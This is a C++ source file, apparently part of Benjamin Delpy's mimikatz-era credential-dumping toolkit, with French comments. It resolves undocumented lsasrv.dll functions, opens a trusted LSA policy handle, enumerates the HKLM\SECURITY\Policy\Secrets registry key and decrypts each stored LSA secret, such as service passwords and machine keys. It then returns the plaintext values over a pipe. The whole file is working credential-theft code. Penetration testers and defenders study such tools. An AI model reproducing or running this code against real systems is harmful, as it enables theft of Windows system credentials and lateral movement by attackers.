1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
|
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "secrets.h"
PLSA_I_OPEN_POLICY_TRUSTED LsaIOpenPolicyTrusted = NULL;
PLSA_R_OPEN_SECRET LsarOpenSecret = NULL;
PLSA_R_QUERY_SECRET LsarQuerySecret = NULL;
PLSA_R_CLOSE LsarClose = NULL;
bool searchSECFuncs()
{
if(!(LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose))
{
if(HMODULE hLsasrv = GetModuleHandle(L"lsasrv"))
{
LsaIOpenPolicyTrusted = reinterpret_cast<PLSA_I_OPEN_POLICY_TRUSTED>(GetProcAddress(hLsasrv, "LsaIOpenPolicyTrusted"));
LsarOpenSecret = reinterpret_cast<PLSA_R_OPEN_SECRET>(GetProcAddress(hLsasrv, "LsarOpenSecret"));
LsarQuerySecret = reinterpret_cast<PLSA_R_QUERY_SECRET>(GetProcAddress(hLsasrv, "LsarQuerySecret"));
LsarClose = reinterpret_cast<PLSA_R_CLOSE>(GetProcAddress(hLsasrv, "LsarClose"));
}
return (LsaIOpenPolicyTrusted && LsarOpenSecret && LsarQuerySecret && LsarClose);
}
else return true;
}
__kextdll bool __cdecl getSECFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
wostringstream monStream;
monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchSECFuncs() ? L"OK :)" : L"KO :(") << endl << endl <<
L"@LsaIOpenPolicyTrusted = " << LsaIOpenPolicyTrusted << endl <<
L"@LsarOpenSecret = " << LsarOpenSecret << endl <<
L"@LsarQuerySecret = " << LsarQuerySecret << endl <<
L"@LsarClose = " << LsarClose << endl;
return sendTo(monPipe, monStream.str());
}
__kextdll bool __cdecl getSecrets(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
if(searchSECFuncs())
{
bool sendOk = true;
wstring message;
LSA_HANDLE hPolicy;
if(NT_SUCCESS(LsaIOpenPolicyTrusted(&hPolicy)))
{
HKEY hKeysSecrets;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SECURITY\\Policy\\Secrets", 0, KEY_READ, &hKeysSecrets) == ERROR_SUCCESS)
{
DWORD nbKey, maxKeySize;
if(RegQueryInfoKey(hKeysSecrets, NULL, NULL, NULL, &nbKey, &maxKeySize, NULL, NULL, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
for(DWORD i = 0; (i < nbKey) && sendOk; i++)
{
DWORD buffsize = (maxKeySize+1) * sizeof(wchar_t);
LSA_UNICODE_STRING monNomSecret = {0, 0, new wchar_t[buffsize]};
if(RegEnumKeyEx(hKeysSecrets, i, monNomSecret.Buffer, &buffsize, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
monNomSecret.Length = monNomSecret.MaximumLength = static_cast<USHORT>(buffsize * sizeof(wchar_t));
message.assign(L"\nSecret : "); message.append(mod_text::stringOfSTRING(monNomSecret)); message.push_back(L'\n');
LSA_HANDLE hSecret;
if(NT_SUCCESS(LsarOpenSecret(hPolicy, &monNomSecret, SECRET_QUERY_VALUE, &hSecret)))
{
LSA_SECRET * monSecret = NULL;
if(NT_SUCCESS(LsarQuerySecret(hSecret, &monSecret, NULL, NULL, NULL)))
{
message.append(L"Credential : "); message.append(mod_text::stringOrHex(reinterpret_cast<PBYTE>(monSecret->Buffer), monSecret->Length)); message.push_back(L'\n');
LsaFreeMemory(monSecret);
}
else message.append(L"Erreur : Impossible de récupérer le secret\n");
LsarClose(&hSecret);
}
else message.append(L"Erreur : Impossible d\'ouvrir le secret\n");
}
delete[] monNomSecret.Buffer;
sendOk = sendTo(monPipe, message);
}
message.clear();
} else message.assign(L"Erreur : Impossible d\'obtenir des information sur le registre secret\n");
RegCloseKey(hKeysSecrets);
}
else message.assign(L"Erreur : Impossible d\'ouvrir la clé Secrets\n");
LsarClose(&hPolicy);
}
else message.assign(L"Erreur : Impossible d\'ouvrir la politique\n");
if(!message.empty())
sendOk = sendTo(monPipe, message);
return sendOk;
}
else return getSECFunctions(monPipe, mesArguments);
}
|